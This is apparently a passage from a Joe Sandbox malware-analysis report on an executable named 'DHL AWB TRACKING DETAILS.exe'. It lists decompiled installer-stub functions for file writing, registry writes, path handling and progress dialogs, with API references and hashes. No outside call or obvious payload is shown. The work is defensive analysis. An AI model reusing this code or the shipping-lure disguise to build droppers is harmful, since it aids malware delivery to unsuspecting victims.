                    0x00405813
                    0x0040583b
                    0x00405846
                    0x0040584a
                    0x0040586a
                    0x0040586c
                    0x00405871
                    0x0040587b
                    0x00405888
                    0x0040588d
                    0x00405892
                    0x00405896
                    0x00000000
                    0x00000000
                    0x004058a5
                    0x004058a7
                    0x004058b4
                    0x004058b8
                    0x00405929
                    0x0040592a
                    0x00000000
                    0x004058d4
                    0x004058e1
                    0x00405946
                    0x0040594d
                    0x004058f4
                    0x004058f4
                    0x004058f6
                    0x004058ff
                    0x0040590a
                    0x0040591c
                    0x00405923
                    0x00000000
                    0x00405923
                    0x0040594f
                    0x00405950
                    0x00405955
                    0x00405957
                    0x00405964
                    0x00405964
                    0x00405968
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405959
                    0x00405959
                    0x0040595c
                    0x0040595f
                    0x00405960
                    0x00000000
                    0x00405959
                    0x004058ec
                    0x004058f1
                    0x00000000
                    0x004058f1
                    0x004058b8
                    0x00405815
                    0x00405820
                    0x00405829
                    0x0040582d
                    0x00000000
                    0x00000000
                    0x0040582d
                    0x0040593a

                    APIs
                      • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                      • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                      • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                    • GetShortPathNameA.KERNEL32 ref: 00405829
                    • GetShortPathNameA.KERNEL32 ref: 00405846
                    • wsprintfA.USER32 ref: 00405864
                    • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                    • GlobalFree.KERNEL32 ref: 00405923
                    • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                      • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                      • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                    • String ID: %s=%s$(&B$[Rename]
                    • API String ID: 3772915668-1834469719
                    • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                    • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                    • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                    • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405CE3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                    0x00405ce5
                    0x00405ced
                    0x00405d01
                    0x00405d01
                    0x00405d07
                    0x00405d14
                    0x00405d14
                    0x00405d15
                    0x00405d17
                    0x00405d1b
                    0x00405d1d
                    0x00405d26
                    0x00405d28
                    0x00405d42
                    0x00405d4a
                    0x00405d4a
                    0x00405d4f
                    0x00405d51
                    0x00405d53
                    0x00405d57
                    0x00405d58
                    0x00405d5b
                    0x00405d63
                    0x00405d65
                    0x00405d69
                    0x00000000
                    0x00000000
                    0x00405d6f
                    0x00405d74
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405d74
                    0x00405d79

                    APIs
                    • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                    • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                    • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                    • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Char$Next$Prev
                    • String ID: "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                    • API String ID: 589700163-3134418922
                    • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                    • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                    • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                    • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403E9E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                    0x00403eb0
                    0x00403f44
                    0x00000000
                    0x00403f44
                    0x00403ec1
                    0x00403ec5
                    0x00000000
                    0x00000000
                    0x00403ecb
                    0x00403ed4
                    0x00403ed7
                    0x00403ed7
                    0x00403edd
                    0x00403ee3
                    0x00403ee3
                    0x00403eef
                    0x00403ef5
                    0x00403efc
                    0x00403eff
                    0x00403f02
                    0x00403f04
                    0x00403f04
                    0x00403f0c
                    0x00403f12
                    0x00403f12
                    0x00403f1c
                    0x00403f21
                    0x00403f24
                    0x00403f29
                    0x00403f2c
                    0x00403f2c
                    0x00403f3c
                    0x00403f3c
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                    • String ID:
                    • API String ID: 2320649405-0
                    • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                    • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                    • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                    • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040266E Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4; // 0x7e00
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                    0x0040266e
                    0x00402670
                    0x0040267c
                    0x0040267f
                    0x00402689
                    0x0040268d
                    0x0040268d
                    0x00402693
                    0x004026a0
                    0x004026a8
                    0x004026ab
                    0x004026b1
                    0x004026bf
                    0x004026c4
                    0x004026c8
                    0x004026cb
                    0x004026d4
                    0x004026e0
                    0x004026e4
                    0x004026e7
                    0x004026f1
                    0x00402710
                    0x004026f8
                    0x004026fd
                    0x00402705
                    0x00402708
                    0x0040270d
                    0x0040270d
                    0x00402717
                    0x00402717
                    0x00402729
                    0x00402730
                    0x00402742
                    0x00402742
                    0x00402748
                    0x00402748
                    0x00402753
                    0x00402754
                    0x00402758
                    0x0040275c
                    0x00402762
                    0x00402762
                    0x00402769
                    0x00402156
                    0x00402880
                    0x0040288c

                    APIs
                    • GlobalAlloc.KERNEL32(00000040,00007E00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                    • GlobalFree.KERNEL32 ref: 00402717
                    • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                    • GlobalFree.KERNEL32 ref: 00402730
                    • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                    • String ID:
                    • API String ID: 3294113728-0
                    • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                    • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                    • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                    • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404E23 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                    0x00404e29
                    0x00404e35
                    0x00404e38
                    0x00404e3e
                    0x00404e4a
                    0x00404e4d
                    0x00404e50
                    0x00404e56
                    0x00404e56
                    0x00404e5c
                    0x00404e64
                    0x00404e67
                    0x00404e84
                    0x00404e88
                    0x00404e91
                    0x00404e91
                    0x00404e9b
                    0x00404ea4
                    0x00404eb0
                    0x00404eb7
                    0x00404ebb
                    0x00404ebe
                    0x00404ed1
                    0x00404edf
                    0x00404edf
                    0x00404ee3
                    0x00404ee5
                    0x00404ee8
                    0x00000000
                    0x00404ee8
                    0x00404e69
                    0x00404e71
                    0x00404e79
                    0x00404e7f
                    0x00000000
                    0x00404e7f
                    0x00404e79
                    0x00404e67
                    0x00404ef2

                    APIs
                    • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                    • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                    • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                    • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                    • String ID:
                    • API String ID: 2531174081-0
                    • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                    • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                    • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                    • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004046F2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                    0x00404700
                    0x0040470d
                    0x00404713
                    0x00404751
                    0x00404751
                    0x00404760
                    0x00404767
                    0x00000000
                    0x00404769
                    0x00404715
                    0x00404724
                    0x0040472c
                    0x0040472f
                    0x00404741
                    0x00404747
                    0x0040474e
                    0x00000000
                    0x0040474e
                    0x00000000

                    APIs
                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
                    • GetMessagePos.USER32 ref: 00404715
                    • ScreenToClient.USER32 ref: 0040472F
                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Message$Send$ClientScreen
                    • String ID: f
                    • API String ID: 41195575-1993550816
                    • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                    • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                    • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                    • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402B2D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                    0x00402b3a
                    0x00402b48
                    0x00402b4e
                    0x00402b4e
                    0x00402b5c
                    0x00402b5e
                    0x00402b6a
                    0x00402b6f
                    0x00402b71
                    0x00402b71
                    0x00402b7c
                    0x00402b8c
                    0x00402b9e
                    0x00402b9e
                    0x00402ba6

                    APIs
                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                    • wsprintfA.USER32 ref: 00402B7C
                    • SetWindowTextA.USER32(?,?), ref: 00402B8C
                    • SetDlgItemTextA.USER32 ref: 00402B9E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Text$ItemTimerWindowwsprintf
                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                    • API String ID: 1451636040-1158693248
                    • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                    • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                    • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                    • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004022F5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t30 =  *0x423f50; // 0x0
				_t31 = _t30 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}











                    0x004022f6
                    0x004022fb
                    0x00402305
                    0x0040230f
                    0x00402312
                    0x0040231c
                    0x00402322
                    0x0040232c
                    0x00402333
                    0x0040233b
                    0x00402349
                    0x0040234d
                    0x00402358
                    0x00402358
                    0x0040235c
                    0x00402360
                    0x00402366
                    0x0040236b
